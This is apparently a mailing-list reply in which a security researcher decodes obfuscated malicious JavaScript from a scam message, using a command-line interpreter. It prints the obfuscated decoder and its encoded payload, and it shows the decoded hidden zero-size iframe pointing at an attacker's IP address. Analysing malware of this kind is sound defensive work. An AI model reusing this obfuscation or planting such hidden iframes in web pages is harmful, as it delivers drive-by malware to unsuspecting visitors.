<<< Date Index >>>     <<< Thread Index >>>

Re: Java script exploit



ps, this decodes to the following HTML snippet (i have deliberately
obfuscated the tags):

[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]

here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
port for OpenBSD years ago, and the source is available for all at

        http://www.njs-javascript.org/

i extracted the javascript functions from the forwarded message and loaded
it into a file, bad2.js:

$ cat bad2.js
function dc(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,22,2,4,19,56,49
,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9
,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,
39,34,29,23,45,3,37,25,30,35,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=
String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}
//document.write(r)             // JN no document object
print(r);                       // JN so print it instead
}
}
dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT')

i made some modifications to deal with the fact that there is no document
object in this context. see the "JN" comments. now when i use the
javascript toolkit, i can acutally run it. it will print the decoded
string object 'r':


$ js bad2.js
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]


(tags obfuscated) this is what your browser would see and load. unless
your spam/scam detection engine also ran the javascript, it wouldn't see
that. hence, obfuscation.

hopefully this helps people out there decode questionable javasript in the
future.

________
jose nazario, ph.d.                     jose@xxxxxxxxxx
http://monkey.org/~jose/                http://infosecdaily.net/
                                        http://www.wormblog.com/